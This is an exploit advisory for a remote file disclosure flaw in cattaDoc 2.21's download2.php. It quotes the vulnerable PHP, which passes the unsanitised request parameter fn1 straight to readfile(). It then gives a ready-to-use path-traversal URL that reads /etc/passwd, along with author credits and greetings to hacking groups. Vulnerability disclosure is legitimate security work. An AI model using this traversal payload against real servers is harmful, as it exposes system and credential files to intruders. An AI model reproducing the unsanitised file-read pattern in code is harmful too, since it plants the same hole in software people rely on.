cattaDoc 2.21(download2.php fn1)Remote File Disclosure Vulnerability
Discovered by: GolD_M = [Mahmood_ali]
Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
V.Code:
##############################################################
$tp = $_REQUEST['mtp'];
$ofn = '"'.$_REQUEST['fn2'].'"';
header("Content-type: $tp");
header("Content-Disposition: attachment; filename=$ofn");
readfile($_REQUEST['fn1']); <<----
##############################################################
Exploit:[Path_cattaDoc]/download2.php?fn1=…/…/…/…/…/…/etc/passwd